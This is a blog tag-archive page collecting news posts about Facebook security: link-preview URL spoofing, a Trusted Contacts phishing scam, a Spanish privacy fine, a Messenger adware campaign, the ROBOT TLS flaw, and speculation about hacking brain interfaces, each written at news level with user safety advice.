Tag Archives: Facebook

19-Year-Old TLS Vulnerability Weakens Modern Website Crypto

New research shows how an old vulnerability called ROBOT can be exploited using an adaptive chosen-ciphertext attack to reveal the plaintext for a given TLS session.

Read More

Wait, Do You Really Think That’s A YouTube URL? Spoofing Links On Facebook

facebook-link-spoofing

While scrolling on Facebook how you decide which link/article should be clicked or opened?

Facebook timeline and Messenger display title, description, thumbnail image and URL of every shared-link, and this information are enough to decide if the content is of your interest or not.

Since Facebook is full of spam, clickbait and fake news articles these days, most users do not click every second link served to them.

But yes, the possibility of opening an article is much higher when the content of your interest comes from a legitimate and authoritative website, like YouTube or Instagram.

However, what if a link shared from a legitimate website lands you into trouble?

Even before links shared on Facebook could not be edited, but to stop the spread of misinformation and false news, the social media giant also removed the ability for Pages to edit title, description, thumbnail image of a link in July 2017.

However, it turns out that—spammers can spoof URLs of the shared-links to trick users into visiting pages they do not expect, redirecting them to phishing or fake news websites with malware or malicious content.

Discovered by 24-year-old security researcher Barak Tawily, a simple trick could allow anyone to spoof URLs by exploiting the way Facebook fetch link previews.

In brief, Facebook scans shared-link for Open Graph meta tags to determine page properties, specifically ‘og:url’, ‘og:image’ and ‘og:title’ to fetch its URL, thumbnail image and title respectively.

facebook security

Interestingly, Tawily found that Facebook does not validate if the link mentioned in ‘og:url’ meta tag is same as the page URL, allowing spammers to spread malicious web pages on Facebook with spoofed URLs by just adding legitimate URLs in ‘og:url’ Open Graph meta tag on their websites.

“In my opinion, all Facebook users think that preview data shown by Facebook is reliable, and will click the links they are interested in, which makes them easily targeted by attackers that abuse this feature in order to perform several types of attacks, including phishing campaigns/ads/click fraud pay-per-click,” Tawily told The Hacker News.

Tawily reported the issue to Facebook, but the social media giant refused to recognise it as a security flaw and referred that Facebook uses “Linkshim” to protect against such attacks.

If you are unaware, every time a link is clicked on Facebook, a system called “Linkshim” checks that URL against the company’s own blacklist of malicious links to avoid phishing and malicious websites.

This means if an attacker is using a new domain for generating spoofed links, it would not be easy for Linkshim system to identify if it is malicious.

Although Linkshim also uses machine learning to identify never-seen-before malicious pages by scanning its content, Tawily found that the protection mechanism could be bypassed by serving non-malicious content explicitly to Facebook bot based on User-Agent or IP address.

Tawily has also provided a demo video to show the attack in action. You can watch the video above.

Since there is no way to check the actual URL behind a shared link on Facebook without opening it, there is a little user can do to protect themselves except being vigilant.

Scam Alert: Your Trusted Friends Can Hack Your Facebook Account

how-to-hack-facebook-account

If you receive a message from any of your Facebook Friends asking for urgent help to recover their Facebook account, since they’ve added you as one of their ‘Trusted Contacts‘—just don’t blindly believe it.

Researchers have detected a new Facebook phishing scam that can even trick an experienced technical user into falling victim to the scam, helping an attacker gain access to your Facebook account.

This latest social media scam is abusing “Trusted Contact”—a Facebook account recovery feature that sends secret access codes to a few of your close friends in order to help you regain access to your Facebook account in case you forget your password or lost access to your account.

According to a public security alert published by AccessNow, the attack initiates by an already compromised account of one of your friends, asking for urgent help to get back into his/her Facebook account.

The attacker explains that you are listed as one of his/her Trusted Contacts on Facebook and asks you to check your email for a recovery code and share with the attacker (who’s hiding behind the identity of your friend).

However, in actual, the code you received is not the key to unlock your friend’s account, but instead, the attacker initiated “Forgot my password” request for your account in an attempt to hijack your Facebook account.

Knowing that a friend is in trouble, apparently one would share the code without giving a second thought.

“The new attack targets people using Facebook, and it relies on your lack of knowledge about the platform’s Trusted Contacts feature,” Access Now warns.

You should know Facebook’s Trusted Contacts feature doesn’t work the way this phishing attack suggests. To understand how this feature works, you can head on to this Facebook post.

The Access Now says, “So far we’re seeing the majority of reports [falling victims to this new Facebook phishing scam] from human right defenders and activists from the Middle East and North Africa.”

Although this latest Facebook scam is initiated using a compromised Facebook account of one of your friends, any of your Facebook friend can also intentionally trick you into handing over your Facebook account to them (looking at the way how people accept friend requests sent by anyone on the social media platform).

facebook-trusted-contact

The best way to protect yourself is always to be vigilant to every recovery emails you receive, and read the recovery message or email carefully, even if it is sent by one of your actual friends.

Stay Safe!

Powered by WPeMatico

Facebook slapped with $1.43 million fine for violating users’ privacy in Spain

facebook-privacy

Facebook is once again in trouble regarding its users’ privacy.

The social media giant has recently been heavily fined once again for a series of privacy violations in Spain.

Recently, Google also incurred a record-breaking fine of $2.7 billion (€2.42 billion) by the European antitrust officials for unfairly manipulating search results since at least 2008.

Now, the Spanish Data Protection Agency (AEPD) has issued a €1.2 Million (nearly $1.4 Million) fine against Facebook for breaching laws designed to protect its people’s information and confidentiality.

According to the data protection watchdog, the social network collects its users’ personal data without their ‘unequivocal consent’ and makes the profit by sharing the data with advertisers and marketers.

The AEPD also found Facebook collects sensitive data on user’s ideology, religious beliefs, sex and personal tastes and navigation—either directly from its own services or through third parties—without clearly informing its users how this information would be used.

This activity constituted a “very serious” infringement of the country’s local data protection law (LOPD), for which the authority fined the company €600,000 ($718,062).

The regulator also identified two “serious” violations of privacy laws, including:

  1. Tracking people through the use of “Like” button social plug-ins embedded in other non-Facebook web pages—for which it is fined €300,000 ($359,049).
  2. Failing to delete data collected from users once it has finished using it, in fact, the company “retains and reuses it later associated with the same user”—which resulted in another €300,000 ($359,049) fines.

The AEPD also said that Facebook’s existing privacy policy contains “generic and unclear terms,” and doesn’t “adequately collect the consent of either its users or nonusers, which constitutes a serious infringement.”

However, Facebook denied any wrongdoing and intended to appeal the decision of the Spanish data protection authority, providing the following statement.

“We take note of the DPA’s decision with which we respectfully disagree. Whilst we value the opportunities we’ve had to engage with the DPA to reinforce how seriously we take the privacy of people who use Facebook, we intend to appeal this decision.” 

“As we made clear to the DPA, users choose which information they want to add to their profile and share with others, such as their religion. However, we do not use this information to target adverts to people.”

In May, the social media giant was fined €150,000 ($179,532) by for the way Facebook targeted advertising and tracked users.

Powered by WPeMatico

Facebook Messenger: Beware of malware!

pandasecurity-MC-facebook-messenger-malware

New cross-platform malware for Windows/Mac/Linux spreading via Facebook Messenger

A cyber-criminal gang is using Facebook Messenger to spread a new malware specimen through links to spoof websites. This threat, which is highly sophisticated and has been customized for each Web browser, has been uncovered by a security expert who received a suspicious message from one of their Facebook friends and decided to analyze its content.

How malware works

The mechanics of the attack are relatively simple. The targeted user receives a Facebook message that includes the recipient’s name, the word ‘video’ and a shocked emoji followed by a shortened URL. As the message comes from one of the victim’s friends, they are very likely to click the link in order to view its content. The malicious link opens a Google document containing a blurry picture taken from the victim’s Facebook and which looks like a playable movie. Then, if the victim attempts to play the video, the malware will send them to one of a number of different websites, depending on their Web browser, operating system, location, and other factors. This site will then prompt the user to install malicious software.

Google Chrome users, for example, are redirected to a fake YouTube channel, complete with the official logo and branding. This site shows the user a fake error message designed to trick them into downloading a malicious Chrome extension. Firefox users, however, are sent to a website displaying a fake Flash update notice, which, once run, attempts to run a Windows executable to install adware. Finally, Safari users are taken to a similar site, customized for macOS, encouraging them to download a malicious .dmg file.

A highly complex, sophisticated attack

This type of malware is designed to track the victim’s browsing activity using cookies and display targeted adverts, but also to use social engineering to trick the user into clicking on them. The malware is capable of spreading across different platforms via Facebook Messenger, using multiple domains to prevent tracking and earning clicks.
The malicious code is highly sophisticated and complex, and researchers suggest that the malicious links are being sent from real Messenger accounts compromised as a result of stolen passwords, hijacked browsers or clickjacking techniques. Each click on the ads generates revenue for the malware authors, and even though there is relatively little known about the malware campaign and those behind it, the sheer number of Facebook Messenger users gives attackers access to an extremely large number of potential victims.

How to protect yourself from malware

One simple way to avoid falling victim to this scam is to use caution with any link received from a Facebook friend. For greater security, experts recommend having a trusted, up-to-date antivirus such as Panda Protection installed on your computer to protect your system with the best protection. In addition to this, a spokesperson for Facebook has confirmed that the company maintains a number of automated systems to help stop the distribution of harmful links and files via the social networking site.

The post Facebook Messenger: Beware of malware! appeared first on Panda Security Mediacenter.

Read More

Facebook Telepathy Texting – Could It Be Hacked?

Is telepathy texting the next step in technology communications?

With over 2 billion registered members, Facebook is the world’s most popular online service. But to maintain that title, Facebook is constantly developing new services to keep people logging in. In a recent video conference, Facebook chief Mark Zuckerberg discussed one of the cutting edge projects his team are working on. The top secret Building 8 division has begun to develop what they call a “direct brain interface”, or the technology that would allow to text by “telepathy”.

What would you do with a direct brain interface?

The direct brain interface is intended to capture the words you plan to speak as they pass through your brain. These thoughts would then be converted into text, ready for transmission – to a nearby screen, or even directly into the mind of another person using a similar interface.

Initially, Facebook hopes that their new technology will allow people with brain injuries or communication problems finally “speak” with the outside world. One scientist working on the project believes such a device would be “as transformative as the computer mouse”.

Taking the direct brain interface mainstream

Once the medical application has been proven, Facebook would naturally expect to take the interface mainstream. Zuckerberg described how he would like to see the technology used to send messages telepathically between Facebook users.

Because the technology is “decades” from release, it is hard to properly imagine what the interface could do. At the most basic level it will probably work like a person-to-person version of the Facebook Messenger app. Presumably users would be able to send text messages direct to the brain of their friends, anywhere in the world without having to lift a finger, or making a sound.

The potential for problems

Just like any computing device, there is always a potential risk that the direct brain interface could be hacked. Again, the specifics of such an attack are hard to guess, but could be relatively harmless, such as receiving unwanted advertising messages directly into the brain.

The outcomes of a cyberattack could conceivably be far worse too. Malware that increases processor activity could cause the interface to overheat, damaging the brain for instance. As the Stuxnet virus demonstrated, malware can cause physical damage. But if that damage is caused to devices connected directly to the human brain, the results could be catastrophic – potentially fatal.

Plenty of time to prepare

The good news is that Facebook’s telepathic text system is still a long, long way from even having something to test. It will be many years before we see a working prototype, let alone a unit that we can actually buy.

In the meantime, engineers will be hard at work developing security measures to protect users against hackers and malware. And as devices finally start to appear, you can expect to see new anti-malware products going on sale to add an extra layer of defence.

In the meantime, why not check if Facebook Messenger is properly protected on your phone with a free Panda Mobile Security download

The post Facebook Telepathy Texting – Could It Be Hacked? appeared first on Panda Security Mediacenter.

Read More

Beware of Windows/MacOS/Linux Virus Spreading Through Facebook Messenger

how-to-hack-facebook-account

If you came across any Facebook message with a video link sent by anyone, even your friend — just don’t click on it.

Security researchers at Kaspersky Lab have spotted an ongoing cross-platform campaign on Facebook Messenger, where users receive a video link that redirects them to a fake website, luring them to install malicious software.

facebook-virus-hacking-account-malware

Although it is still unclear how the malware spreads, researchers believe spammers are using compromised accounts, hijacked browsers, or clickjacking techniques to spread the malicious link.

The attackers make use of social engineering to trick users into clicking the video link, which purports to be from one of their Facebook friends, with the message that reads “< your friend name > Video” followed by a bit.ly link, as shown.

Here’s How this Cross-Platform Malware Works:

facebook-virus-hacking-account-software

The URL redirects victims to a Google doc that displays a dynamically generated video thumbnail, like a playable movie, based on the sender’s images, which if clicked, further redirects users to another customised landing page depending upon their browser and operating system.

For example, Mozilla Firefox users on Windows are redirected to a website displaying a fake Flash Player Update notice, and then offered a Windows executable, which is flagged as adware software.

facebook-virus-hacking-account-1

Google Chrome users are redirected to a website that masquerades as YouTube with similar YouTube logo, which displays a fake error message popup, tricking victims into downloading a malicious Chrome extension from the Google Web Store.

facebook-virus-hacking-account

The extension actually is a downloader that downloads a file of attacker’s choice to the victim’s computer.

“At the time of writing, the file which should have been downloaded was not available,” David Jacoby, a chief security researcher from Kaspersky Lab, writes in a blog post published today.

“One interesting finding is that the Chrome Extension has log files from the developers displaying usernames. It is unclear if this is related to the campaign, but it is still an amusing piece of information.”

Users of Apple Mac OS X Safari ends up on a web page similar to when using Firefox, but it was customised for MacOS users with a fake update for Flash Media Player, which if clicked, downloads an OSX executable .dmg file, which is also adware.

Same in case of Linux, user redirects to another landing page designed for Linux users.

The attackers behind the campaign are not actually infecting users of all platform with any banking Trojan or exploit kits, but with adware to make a lot of money by generating revenue from ads.

Spam campaigns on Facebook are quite common. A few years ago, researchers found cyber criminals using boobytrapped .JPG image files to hide their malware in order to infect Facebook users with variants of the Locky ransomware, which encrypts all files on the infected PC until a ransom is paid.

To keep yourself safe, you are advised not to get curious to look at images or video links sent by anyone, even your friend, without verifying it with them, and always keep your antivirus software up-to-date.

Powered by WPeMatico